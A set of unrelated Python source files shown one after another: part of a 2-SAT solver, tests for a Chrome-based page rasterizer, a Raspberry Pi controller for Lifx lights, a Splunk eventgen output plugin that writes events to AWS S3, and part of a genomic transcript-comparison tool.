return edges, adjacents[:node_num], reversed_adjs[:node_num], node_dict, var_dict
def is_satisfiable(n, m, clauses):
edges, implication_g, reversed_imp_g, node_map, var_map = build_implication_graph(n, clauses)
ccs = analyse_connected_components_(n, implication_g, reversed_imp_g, var_map)
#print(ccs)
result = collections.defaultdict(lambda: None)
for cc in ccs:
cc_vars = set([])
for node in cc:
lit = var_map[node]
if abs(lit) in cc_vars:
return None
else:
cc_vars.add(abs(lit))
if result[abs(lit)] is None:
if lit < 0:
result[abs(lit)] = 0
else:
result[abs(lit)] = 1
return result
def circuit_design():
n, m = map(int, input().split())
clauses = [ list(map(int, input().split())) for i in range(m) ]
result = is_satisfiable(n, m, clauses)
if result is None:
print("UNSATISFIABLE")
else:
print("SATISFIABLE")
print(" ".join(str(i if result[i] else -i) for i in range(1, n+1)))
if __name__ == '__main__':
threading.Thread(target=circuit_design).start()
|
rasterize_test.py
|
from rasterize import rasterize, find_zombie_processes, merge_options, DEFAULT_CHROME_OPTIONS, rasterize_image_command
import demistomock as demisto
from CommonServerPython import entryTypes
from tempfile import NamedTemporaryFile
import subprocess
import os
import logging
import http.server
import time
import threading
import pytest
# disable warning from urllib3. these are emitted when python driver can't connect to chrome yet
logging.getLogger("urllib3").setLevel(logging.ERROR)
RETURN_ERROR_TARGET = 'rasterize.return_error'
def test_rasterize_email_image(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='png')
caplog.clear()
def test_rasterize_email_pdf(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=False)
caplog.clear()
def test_rasterize_email_pdf_offline(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=True)
caplog.clear()
def test_rasterize_no_defunct_processes(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=False)
process = subprocess.Popen(['ps', '-aux'], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
processes_str, _ = process.communicate()
processes = processes_str.split('\n')
defunct_process_list = [process for process in processes if 'defunct' in process]
assert not defunct_process_list
zombies, output = find_zombie_processes()
assert not zombies
assert 'defunct' not in output
caplog.clear()
def test_find_zombie_processes(mocker):
ps_output = ''' PID PPID S CMD
1 0 S python /tmp/pyrunner/_script_docker_python_loop.py
39 1 Z [soffice.bin] <defunct>
55 1 Z [gpgconf] <defunct>
57 1 Z [gpgconf] <defunct>
59 1 Z [gpg] <defunct>
61 1 Z [gpgsm] <defunct>
63 1 Z [gpgconf] <defunct>
98 1 Z [gpgconf] <defunct>
100 1 Z [gpgconf] <defunct>
102 1 Z [gpg] <defunct>
'''
mocker.patch.object(subprocess, 'check_output', return_value=ps_output)
mocker.patch.object(os, 'getpid', return_value=1)
zombies, output = find_zombie_processes()
assert len(zombies) == 9
assert output == ps_output
def test_merge_options():
res = merge_options(DEFAULT_CHROME_OPTIONS, '')
assert res == DEFAULT_CHROME_OPTIONS
res = merge_options(DEFAULT_CHROME_OPTIONS, '[--disable-dev-shm-usage],--disable-auto-reload, --headless')
assert '--disable-dev-shm-usage' not in res
assert '--no-sandbox' in res # part of default options
assert '--disable-auto-reload' in res
assert len([x for x in res if x == '--headless']) == 1 # should have only one headless option
res = merge_options(DEFAULT_CHROME_OPTIONS, r'--user-agent=test\,comma')
assert len([x for x in res if x.startswith('--user-agent')]) == 1
assert '--user-agent=test,comma' in res
res = merge_options(DEFAULT_CHROME_OPTIONS, r'[--user-agent]') # remove user agent
assert len([x for x in res if x.startswith('--user-agent')]) == 0
def test_rasterize_large_html():
path = os.path.realpath('test_data/large.html')
res = rasterize(path=f'file://{path}', width=250, height=250, r_type='png')
assert res
@pytest.fixture
def http_wait_server():
# Simple http handler which waits 10 seconds before responding
class WaitHanlder(http.server.BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
time.sleep(10)
try:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("<html><head><title>Test wait handler</title></head>"
"<body><p>Test Wait</p></body></html>", 'utf-8'))
self.flush_headers()
except BrokenPipeError: # ignore broken pipe as socket might have been closed
pass
# disable logging
def log_message(self, format, *args):
pass
with http.server.ThreadingHTTPServer(('', 10888), WaitHanlder) as server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield
server.shutdown()
server_thread.join()
# Some web servers can block the connection after the http is sent
# In this case chromium will hang. An example for this is:
# curl -v -H 'user-agent: HeadlessChrome' --max-time 10 "http://www.grainger.com/" # disable-secrets-detection
# This tests access a server which waits for 10 seconds and makes sure we timeout
def test_rasterize_url_long_load(mocker, http_wait_server):
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
time.sleep(1) # give time to the servrer to start
rasterize('http://localhost:10888', width=250, height=250, r_type='png', max_page_load_time=5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert 'Timeout exception' in err_msg
return_error_mock.reset_mock()
# test that with a higher value we get a response
assert rasterize('http://localhost:10888', width=250, height=250, r_type='png', max_page_load_time=0)
assert not return_error_mock.called
def test_rasterize_image_to_pdf(mocker):
path = os.path.realpath('test_data/image.png')
mocker.patch.object(demisto, 'args', return_value={'EntryID': 'test'})
mocker.patch.object(demisto, 'getFilePath', return_value={"path": path})
mocker.patch.object(demisto, 'results')
rasterize_image_command()
assert demisto.results.call_count == 1
# call_args is tuple (args list, kwargs). we only need the first one
results = demisto.results.call_args[0]
assert len(results) == 1
assert results[0]['Type'] == entryTypes['entryInfoFile']
|
lifx.py
|
"""
Provides physical switching of Lifx devices from a Raspberry Pi
"""
import argparse
import random
from threading import Thread, Timer
from time import time
from time import sleep
import lifxlan
import yaml
from gpiozero import Button as LifxButton
class Discovery(Thread):
"""An endless thread that discovers Lifx devices"""
def __init__(self, name, groups):
Thread.__init__(self)
self.name = name
self.lifx = lifxlan.LifxLAN()
self.groups = groups
def run(self):
print("DEBUG: starting discovery thread")
sleep_time = 5
devices_max = 0
while True: # pylint: disable=too-many-nested-blocks
try:
devices = self.lifx.get_devices()
print(f"DEBUG: found {len(devices)} Lifx devices")
for device in devices:
grp = device.get_group()
if grp:
grp = grp.lower()
if grp in self.groups:
found = False
for light in self.groups[grp].devices:
if device.get_mac_addr() == light.get_mac_addr():
found = True
if not found:
self.groups[grp].add_device(device)
print(f"INFO: {device.get_label()} added to group {grp}")
if len(devices) > devices_max:
devices_max = len(devices)
elif devices and len(devices) == devices_max:
# increase sleep until max sleep of 15 minutes
if sleep_time < (15 * 60):
sleep_time = sleep_time + 5
except lifxlan.errors.WorkflowException:
print("WARN: WorkflowException on discovery")
sleep(sleep_time)
class LifxSwitch():
"""Provides the main logic of switching Lifx devices from a Raspberry Pi"""
def __init__(self, args=None):
self.args = args
if not self.args:
self.parse_args()
if not self.args:
raise RuntimeError('Args not provided')
LifxButton.last_release = 0
LifxButton.was_held = False
LifxButton.single_click = None
LifxButton.double_click = None
LifxButton.long_click = None
LifxButton.scenes = None
LifxButton.sc_timer = None
LifxButton.lifx_group = None
self.buttons = {}
self.groups = {}
self.hold_time = 0.400
self.sc_threshold = 0.400
self.transition_time = 0.400 * 1000
self.parse_config(self.args.config_file)
self.discovery_thread = Discovery('lifx_discovery', self.groups)
self.discovery_thread.start()
def parse_args(self):
"""Parse the arguments to the program"""
parser = argparse.ArgumentParser()
parser.add_argument('--config-file', '-c', required=True)
self.args = parser.parse_args()
def parse_config(self, config_file):
"""
Parse the configuration file
XXX: This could be much better
"""
config = None
with open(config_file, 'rb') as fh: # pylint: disable=invalid-name
config = yaml.safe_load(fh)
if 'timing' in config:
if 'double_click' in config['timing']:
self.sc_threshold = config['timing']['double_click'] / 1000
if 'hold_time' in config['timing']:
self.hold_time = config['timing']['hold_time'] / 1000
for button_number, b_conf in config['buttons'].items():
button = LifxButton(button_number, hold_time=self.hold_time)
button.when_held = self.held
button.when_released = self.released
button.single_click = b_conf.get('single', None)
button.double_click = b_conf.get('double', None)
button.long_click = b_conf.get('long', None)
button.scenes = b_conf['scenes']
button.sc_timer = self.get_sc_timer(button)
self.buttons[button_number] = button
group_name = b_conf['group'].lower()
group = self.groups.get(group_name, None)
if not group:
group = lifxlan.Group()
self.groups[group_name] = group
button.lifx_group = {
'name': group_name,
'group': group,
}
def toggle_power(self, button, group):
"""Toggle the power status of the given group of devices"""
power = None
for device in group.devices:
try:
power = device.get_power()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_power for button {button.pin.number}")
if power is not None:
break
if power is None:
print(f"WARN: no devices replied to get_power for button {button.pin.number}")
return
group.set_power(not power, self.transition_time, True)
print(f"DEBUG: toggled power {not power}")
def reset_or_boost(self, button, group):
"""Reset the devices to the default scene, or to the "boost" scene if already on the default"""
color = None
for device in group.devices:
try:
color = device.get_color()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_color for button {button.pin.number}")
if color is not None:
break
if color is None:
print(f"WARN: no devices replied to get_color for button {button.pin.number}")
return
if (color[2] == button.scenes['default'][2]) and (color[3] == button.scenes['default'][3]):
group.set_color(button.scenes['boost'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was default, now boosted")
else:
# is something non-default, now back to default
group.set_color(button.scenes['default'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} restored to default")
group.set_power('on', self.transition_time, True)
def dim_cycle_plus_colourful(self, button, group):
"""
Progressively dim the devices in the group, or set them to random colours if fully dimmed
Resets to the default scene if none of the dim scenes are detected
"""
color = None
for device in group.devices:
try:
color = device.get_color()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_color for button {button.pin.number}")
if color is not None:
break
if color is None:
print(f"WARN: no devices replied to get_color for button {button.pin.number}")
return
if (color[2] == button.scenes['default'][2]) and (color[3] == button.scenes['default'][3]):
group.set_color(button.scenes['dim'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was default, now dim")
elif (color[2] == button.scenes['dim'][2]) and (color[3] == button.scenes['dim'][3]):
group.set_color(button.scenes['dimmer'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was dim, now dimmer")
elif (color[2] == button.scenes['dimmer'][2]) and (color[3] == button.scenes['dimmer'][3]):
group.set_color(button.scenes['dimmest'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was dimmer, now dimmest")
elif (color[2] == button.scenes['dimmest'][2]) and (color[3] == button.scenes['dimmest'][3]):
# multi-threaded color change
threads = []
for device in group.devices:
color = [random.randint(0, 65535), 49151, 49151, 3500]
thread = Thread(target=device.set_color, args=[color, self.transition_time, True])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
print(f"DEBUG: {button.pin.number} was dimmest, now colourful")
else:
group.set_color(button.scenes['default'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} is now back to default")
group.set_power('on', self.transition_time, True)
def get_sc_timer(self, button):
"""Returns a timer to use with single/double click detection"""
return Timer(self.sc_threshold, self.single_click, args=[button])
def single_click(self, button):
"""Executes the single click function of the button"""
print(f"INFO: single click detected on button {button.pin.number}")
# provide timer for next single click
button.sc_timer = self.get_sc_timer(button)
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.single_click)(button, group)
@staticmethod
def sc_detection(button):
"""Starts the timer to see if this is a single click"""
if not button.sc_timer.is_alive():
print("DEBUG: starting single/double click timer")
button.sc_timer.start()
def double_click(self, button):
"""Executes the double click function of the button"""
print(f"INFO: double click detected on button {button.pin.number}")
button.sc_timer.cancel()
# provide timer for next single click
button.sc_timer = self.get_sc_timer(button)
if button.double_click:
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.double_click)(button, group)
def long_press(self, button):
"""Executes the long press function of the button"""
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.long_click)(button, group)
def click(self, button):
"""Receives a click event (from button released event)"""
if (time() - button.last_release) < self.sc_threshold:
self.double_click(button)
else:
self.sc_detection(button)
def held(self, button):
"""Receives a button held event"""
print(f"DEBUG: {button.pin.number} is being held")
button.was_held = True
self.long_press(button)
def released(self, button):
"""Receives a button released event"""
if button.was_held:
print(f"DEBUG: {button.pin.number} has been released")
else:
print(f"DEBUG: {button.pin.number} has been clicked")
self.click(button)
button.was_held = False
button.last_release = time()
if __name__ == '__main__':
switch = LifxSwitch()
# Note: if the discovery thread exits, the program will exit
|
awss3.py
|
import datetime
import threading
import uuid
import requests
from splunk_eventgen.lib.logging_config import logger
from splunk_eventgen.lib.outputplugin import OutputPlugin
try:
import boto3
import botocore.exceptions
boto_imported = True
except ImportError:
boto_imported = False
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class AwsS3OutputPlugin(OutputPlugin):
"""
AwsS3 output will enable events that are generated to be sent directly
to AWS S3 through the boto3 API. In order to use this plugin,
you will need to supply AWS setting in config file.
"""
name = "awsS3"
useOutputQueue = False
# MAXQUEUELENGTH = 100
validSettings = [
"awsS3BucketName",
"awsS3CompressionType",
"awsS3EventType",
"awsS3ObjectPrefix",
"awsS3ObjectSuffix",
"awsRegion",
"awsKeyId",
"awsSecretKey",
"awsS3EventPerKey",
]
defaultableSettings = [
"awsKeyId",
"awsSecretKey",
"awsS3EventType",
"awsS3CompressionType",
"awsS3ObjectPrefix",
"awsS3ObjectSuffix",
]
def __init__(self, sample, output_counter=None):
# Override maxQueueLength to EventPerKey so that each flush
# will generate one aws key
if sample.awsS3EventPerKey:
sample.maxQueueLength = sample.awsS3EventPerKey
OutputPlugin.__init__(self, sample, output_counter)
if not boto_imported:
logger.error("There is no boto3 or botocore library available")
return
# disable any "requests" warnings
requests.packages.urllib3.disable_warnings()
# Bind passed in samples to the outputter.
self.awsS3compressiontype = (
sample.awsS3CompressionType
if hasattr(sample, "awsS3CompressionType") and sample.awsS3CompressionType
else None
)
self.awsS3eventtype = (
sample.awsS3EventType
if hasattr(sample, "awsS3EventType") and sample.awsS3EventType
else "syslog"
)
self.awsS3objectprefix = (
sample.awsS3ObjectPrefix
if hasattr(sample, "awsS3ObjectPrefix") and sample.awsS3ObjectPrefix
else ""
)
self.awsS3objectsuffix = (
sample.awsS3ObjectSuffix
if hasattr(sample, "awsS3ObjectSuffix") and sample.awsS3ObjectSuffix
else ""
)
self.awsS3bucketname = sample.awsS3BucketName
logger.debug(
"Setting up the connection pool for %s in %s"
% (self._sample.name, self._app)
)
self._client = None
self._createConnections(sample)
logger.debug("Finished init of awsS3 plugin.")
def _createConnections(self, sample):
try:
if hasattr(sample, "awsKeyId") and hasattr(sample, "awsSecretKey"):
self._client = boto3.client(
"s3",
region_name=sample.awsRegion,
aws_access_key_id=sample.awsKeyId,
aws_secret_access_key=sample.awsSecretKey,
)
if self._client is None:
msg = """
[your_eventgen_stanza]
awsKeyId = YOUR_ACCESS_KEY
awsSecretKey = YOUR_SECRET_KEY
"""
logger.error(
"Failed for init boto3 client: %s, you should define correct 'awsKeyId'\
and 'awsSecretKey' in eventgen conf %s"
% msg
)
raise Exception(msg)
else:
self._client = boto3.client("s3", region_name=sample.awsRegion)
except Exception as e:
logger.error("Failed for init boto3 client: exception = %s" % e)
raise e
# Try list bucket method to validate if the connection works
try:
self._client.list_buckets()
except botocore.exceptions.NoCredentialsError:
msg = """
[default]
aws_access_key_id = YOUR_ACCESS_KEY
aws_secret_access_key = YOUR_SECRET_KEY
"""
logger.error(
"Failed for init boto3 client, you should create "
"'~/.aws/credentials' with credential info %s" % msg
)
raise
logger.debug("Init conn done, conn = %s" % self._client)
def _sendPayloads(self, payload):
numberevents = len(payload)
logger.debug("Sending %s events to s3 key" % numberevents)
self._transmitEvents(payload)
def _transmitEvents(self, payloadstring):
logger.debug(
"Transmission called with payloadstring event number: %d "
% len(payloadstring)
)
records = "".join(payloadstring)
# Different key prefix for different log type
if self.awsS3eventtype == "elbaccesslog":
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().strftime("%Y%m%dT%H%MZ")
+ "_"
+ str(uuid.uuid1())
+ self.awsS3objectsuffix
)
elif self.awsS3eventtype == "s3accesslog":
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().strftime("%Y-%m-%d-%H-%M-%S")
+ "-"
+ str(uuid.uuid1()).replace("-", "").upper()[0:15]
+ self.awsS3objectsuffix
)
else:
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().isoformat()
+ str(uuid.uuid1())
+ self.awsS3objectsuffix
)
logger.debug("Uploading %d events into s3 key: %s " % (len(records), s3keyname))
if self.awsS3compressiontype == "gz":
import io
import gzip
out = io.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(records)
records = out.getvalue()
try:
response = self._client.put_object(
Bucket=self.awsS3bucketname, Key=s3keyname, Body=records
)
logger.debug("response = %s" % response)
except Exception as e:
logger.error("Failed for exception: %s" % e)
logger.debug("Failed sending events to payload: %s" % (payloadstring))
raise e
def flush(self, q):
logger.debug("Flush called on awsS3 plugin with length %d" % len(q))
if len(q) > 0:
try:
payload = []
logger.debug("Currently being called with %d events" % len(q))
for event in q:
if event.get("_raw") is None:
logger.error("failure outputting event, does not contain _raw")
else:
payload.append(event["_raw"])
logger.debug("Finished processing events, sending all to AWS S3")
self._sendPayloads(payload)
except Exception as e:
import traceback
logger.error(traceback.print_exc())
logger.error("failed sending events, reason: %s " % e)
def load():
"""Returns an instance of the plugin"""
return AwsS3OutputPlugin
|
taco_refcomp.py
|
import argparse
import logging
import os
import sys
import operator
import collections
import shutil
import subprocess
import multiprocessing
import taco
import share
import pkgutil
import string
import glob
from taco.lib.bx.intersection import Interval, IntervalTree #1
from taco.lib.bx.cluster import ClusterTree #lx1
from taco.lib.base import Category, GTFAttr #3
from taco.lib.gtf_comp import sort_gtf, GTFFeature #4
from taco.lib.transcript import cmp_strand, parse_gtf, \
strand_int_to_str, NO_STRAND, POS_STRAND, NEG_STRAND, \
find_exon_boundaries, split_exons
# for nearest transcripts calculation
MAX_LOCUS_DIST = 100000000
GENCODE_CATEGORY_MAP = {'IG_C_gene': 'protein_coding',
'IG_D_gene': 'protein_coding',
'IG_J_gene': 'protein_coding',
'IG_V_gene': 'protein_coding',
'IG_LV_gene': 'protein_coding',
'TR_C_gene': 'protein_coding',
'TR_J_gene': 'protein_coding',
'TR_V_gene': 'protein_coding',
'TR_D_gene': 'protein_coding',
'TEC': 'protein_coding',
'nonsense_mediated_decay': 'protein_coding',
'non_stop_decay': 'protein_coding',
'retained_intron': 'protein_coding',
'protein_coding': 'protein_coding',
'ambiguous_orf': 'protein_coding',
'processed_transcript': 'protein_coding',
'Mt_rRNA': 'ncRNA',
'Mt_tRNA': 'ncRNA',
'miRNA': 'ncRNA',
'misc_RNA': 'ncRNA',
'rRNA': 'ncRNA',
'snRNA': 'ncRNA',
'snoRNA': 'ncRNA',
'3prime_overlapping_ncrna': 'ncRNA',
'lincRNA': 'lncRNA',
'sense_intronic': 'lncRNA',
'sense_overlapping': 'lncRNA',
'antisense': 'lncRNA',
'bidirectional_promoter_lncrna' : 'lncRNA',
'ribozyme' : 'lncRNA',
'macro_lncRNA': 'lncRNA',
'non_coding': 'lncRNA',
'bidirectional_promoter_lncRNA': 'lncRNA',
'scaRNA': 'ncRNA',
'sRNA': 'ncRNA',
'IG_pseudogene': 'pseudogene',
'IG_C_pseudogene': 'pseudogene',
'IG_J_pseudogene': 'pseudogene',
'IG_V_pseudogene': 'pseudogene',
'TR_V_pseudogene': 'pseudogene',
'TR_J_pseudogene': 'pseudogene',
'Mt_tRNA_pseudogene': 'pseudogene',
'tRNA_pseudogene': 'pseudogene',
'snoRNA_pseudogene': 'pseudogene',
'snRNA_pseudogene': 'pseudogene',
'scRNA_pseudogene': 'pseudogene',
'rRNA_pseudogene': 'pseudogene',
'misc_RNA_pseudogene': 'pseudogene',
'miRNA_pseudogene': 'pseudogene',
'pseudogene': 'pseudogene',
'processed_pseudogene': 'pseudogene',
'polymorphic_pseudogene': 'pseudogene',
'retrotransposed': 'pseudogene',
'transcribed_processed_pseudogene': 'pseudogene',
'transcribed_unprocessed_pseudogene': 'pseudogene',
'unitary_pseudogene': 'pseudogene',
'transcribed_unitary_pseudogene': 'pseudogene',
'translated_unprocessed_pseudogene': 'pseudogene',
'unprocessed_pseudogene': 'pseudogene'}
def gencode_category_map(x):
if 'ncrna' in x.lower():
out = 'ncRNA'
elif 'lncrna' in x.lower():
out = 'lncRNA'
else:
out = GENCODE_CATEGORY_MAP.get(x, 'other')
return out
# attributes to include in TSV that is generated at the end
FULL_GTF_ATTRS = ['gene_id',
'tss_id',
'annotation',
'category',
'category_relative',
'category_relative_detail',
'cpat_coding_prob',
'orf_size',
'ref_transcript_id',
'ref_gene_id',
'ref_gene_name',
'ref_gene_type',
'ref_length',
'shared_same_strand_bp',
'shared_opp_strand_bp',
'shared_introns',
'shared_splicing']
def wc(infile):
p = subprocess.Popen('wc -l %s' % infile, shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
return int(out.split()[0])
# class + function to get metadata TSV from gtf
class TranscriptMetadata(object):
def __init__(self, gtf_attrs=None):
self.chrom = None
self.start = 0
self.end = 0
self.strand = '.'
self.num_exons = 0
self.length = 0
if gtf_attrs is not None:
for attr in gtf_attrs:
setattr(self, attr, '')
def get_gtf_metadata(gtf_file, gtf_attrs):
if gtf_attrs is None:
gtf_attrs = []
if 'transcript_id' in gtf_attrs:
gtf_attrs.remove('transcript_id')
# read gtf file
metadata_dict = {}
for feature in GTFFeature.parse(open(gtf_file)):
if feature.feature_type != "exon":
continue
t_id = feature.attrs["transcript_id"]
if t_id not in metadata_dict:
# instantiate new metadata
m = TranscriptMetadata()
m.chrom = feature.seqid
m.strand = feature.strand
m.start = feature.start
m.end = feature.end
for gtf_attr in gtf_attrs:
setattr(m, gtf_attr, feature.attrs.get(gtf_attr, 'NA'))
metadata_dict[t_id] = m
else:
m = metadata_dict[t_id]
# update metadata
m.start = feature.start if feature.start < m.start else m.start
m.end = feature.end if feature.end > m.end else m.end
m.length += (feature.end - feature.start)
m.num_exons += 1
return metadata_dict
# function to get bed from GTF for CPAT
def write_bed(chrom, name, strand, score, exons):
assert all(exons[0].start < x.start for x in exons[1:])
assert all(exons[-1].end > x.end for x in exons[:-1])
tx_start = exons[0].start
tx_end = exons[-1].end
block_sizes = []
block_starts = []
for e in exons:
block_starts.append(e.start - tx_start)
block_sizes.append(e.end - e.start)
# make bed fields
fields = [chrom,
str(tx_start),
str(tx_end),
str(name),
str(score),
strand_int_to_str(strand),
str(tx_start),
str(tx_start),
'0',
str(len(exons)),
','.join(map(str,block_sizes)) + ',',
','.join(map(str,block_starts)) + ',']
return fields
class CompareData(object):
__slots__ = ('has_ref', 'has_test', 'category')
def __init__(self):
self.has_ref = False
self.has_test = False
self.category = None
class GlobalStats(object):
FIELDS = ('introns_both', 'introns_ref_only', 'introns_test_only',
'patterns_both', 'patterns_ref_only', 'patterns_test_only',
'cov_both', 'cov_ref_only', 'cov_test_only')
def __init__(self):
for field in GlobalStats.FIELDS:
setattr(self, field, 0)
self.introns_by_category = collections.defaultdict(lambda: 0)
self.patterns_by_category = collections.defaultdict(lambda: 0)
self.cov_by_category = collections.defaultdict(lambda: 0)
def report(self):
# print stats report
introns_total = self.introns_both + self.introns_ref_only + self.introns_test_only
patterns_total = self.patterns_both + self.patterns_ref_only + self.patterns_test_only
cov_total = self.cov_both + self.cov_ref_only + self.cov_test_only
lines = ["introns_total=%d" % (introns_total),
"introns_both=%d" % (self.introns_both),
"introns_ref_only=%d" % (self.introns_ref_only),
"introns_test_only=%d" % (self.introns_test_only),
"introns_precision=%f" % (self.introns_both / float(max(1,self.introns_both + self.introns_test_only))),
"introns_recall=%f" % (self.introns_both / float(max(1,self.introns_both + self.introns_ref_only))),
"patterns_total=%d" % (patterns_total),
"patterns_both=%d" % (self.patterns_both),
"patterns_ref_only=%d" % (self.patterns_ref_only),
"patterns_test_only=%d" % (self.patterns_test_only),
"patterns_precision=%f" % (self.patterns_both / float(max(1,self.patterns_both + self.patterns_test_only))),
"patterns_recall=%f" % (self.patterns_both / float(max(1,self.patterns_both + self.patterns_ref_only))),
"cov_total=%d" % (cov_total),
"cov_both=%d" % (self.cov_both),
"cov_ref_only=%d" % (self.cov_ref_only),
"cov_test_only=%d" % (self.cov_test_only),
"cov_precision=%f" % (self.cov_both / float(max(1,self.cov_both + self.cov_test_only))),
"cov_recall=%f" % (self.cov_both / float(max(1,self.cov_both + self.cov_ref_only)))]
for k in sorted(self.introns_by_category):
lines.append("introns %s=%d" % (k,self.introns_by_category[k]))
for k in sorted(self.patterns_by_category):
lines.append("patterns %s=%d" % (k,self.patterns_by_category[k]))
for k in sorted(self.cov_by_category):
lines.append("cov %s=%d" % (k,self.cov_by_category[k]))
return '\n'.join(lines)
@staticmethod
def from_file(filename):
self = GlobalStats()
with open(filename) as f:
f.next() # introns total
self.introns_both = int(f.next().split('=')[1])
self.introns_ref_only = int(f.next().split('=')[1])
self.introns_test_only = int(f.next().split('=')[1])
f.next() # prec
f.next() # recall
f.next() # patterns total
self.patterns_both = int(f.next().split('=')[1])
self.patterns_ref_only = int(f.next().split('=')[1])
self.patterns_test_only = int(f.next().split('=')[1])
f.next() # prec
f.next() # recall
f.next() # cov total
self.cov_both = int(f.next().split('=')[1])
self.cov_ref_only = int(f.next().split('=')[1])
self.cov_test_only = int(f.next().split('=')[1])
return self
def compute(self, transcripts):
intron_dict = collections.defaultdict(lambda: CompareData())
node_dict = collections.defaultdict(lambda: CompareData())
splicing_pattern_dict = collections.defaultdict(lambda: CompareData())
# find the intron domains of the transcripts
boundaries = find_exon_boundaries(transcripts)
unstranded_transcripts = []
for t in transcripts:
if t.strand == NO_STRAND:
unstranded_transcripts.append(t)
continue
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
# split exons that cross boundaries and get the
# nodes in the transcript path
for n in split_exons(t, boundaries):
n = (t.strand, n[0], n[1])
if is_ref:
node_dict[n].has_ref = True
else:
d = node_dict[n]
d.has_test = True
d.category = t.attrs['category']
splicing_pattern = []
for start,end in t.iterintrons():
n = (t.strand, start, end)
if is_ref:
intron_dict[n].has_ref = True
else:
d = intron_dict[n]
d.has_test = True
d.category = t.attrs['category']
splicing_pattern.append(n)
splicing_pattern = tuple(splicing_pattern)
if len(splicing_pattern) > 0:
if is_ref:
splicing_pattern_dict[splicing_pattern].has_ref = True
else:
d = splicing_pattern_dict[splicing_pattern]
d.has_test = True
d.category = t.attrs['category']
# handle unstranded transcripts
for t in unstranded_transcripts:
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
for n in split_exons(t, boundaries):
found_node = False
for strand in (POS_STRAND, NEG_STRAND):
sn = (strand, n[0], n[1])
if sn in node_dict:
if is_ref:
node_dict[sn].has_ref = True
else:
d = node_dict[sn]
d.has_test = True
d.category = t.attrs['category']
found_node = True
if not found_node:
sn = (NO_STRAND, n[0], n[1])
if is_ref:
node_dict[sn].has_ref = True
else:
d = node_dict[sn]
d.has_test = True
d.category = t.attrs['category']
introns = list(t.iterintrons())
assert len(introns) == 0
# compile statistics
for d in intron_dict.itervalues():
if d.has_ref and d.has_test:
self.introns_both += 1
self.introns_by_category[d.category] += 1
elif d.has_ref:
self.introns_ref_only += 1
elif d.has_test:
self.introns_test_only += 1
self.introns_by_category[d.category] += 1
for d in splicing_pattern_dict.itervalues():
if d.has_ref and d.has_test:
self.patterns_both += 1
self.patterns_by_category[d.category] += 1
elif d.has_ref:
self.patterns_ref_only += 1
elif d.has_test:
self.patterns_test_only += 1
self.patterns_by_category[d.category] += 1
for n,d in node_dict.iteritems():
strand, start, end = n
length = end - start
if d.has_ref and d.has_test:
self.cov_both += length
self.cov_by_category[d.category] += length
elif d.has_ref:
self.cov_ref_only += length
elif d.has_test:
self.cov_test_only += length
self.cov_by_category[d.category] += length
class Match(object):
def __init__(self):
self.nodes = collections.defaultdict(lambda: [])
self.introns = []
self.splicing = False
class MatchStats(object):
@staticmethod
def header_fields():
return ['transcript_id', 'gene_id', 'locus', 'length', 'num_introns',
'ref_transcript_id', 'ref_gene_id', 'ref_orig_gene_id', 'ref_gene_name',
'ref_source', 'ref_gene_type', 'ref_locus',
'ref_length', 'ref_num_introns',
'shared_same_strand_bp', 'shared_opp_strand_bp',
'shared_introns', 'shared_splicing',
'distance', 'category']
def __init__(self):
for field in MatchStats.header_fields():
setattr(self, field, None)
def __str__(self):
fields = []
for field in MatchStats.header_fields():
fields.append(getattr(self, field))
return '\t'.join(map(str,fields))
def copy(self):
other = MatchStats()
for field in MatchStats.header_fields():
setattr(other, field, getattr(self,field))
return other
def add_gtf_attributes(self, feature):
attrs = ['ref_transcript_id', 'ref_gene_id',
#'ref_orig_gene_id',
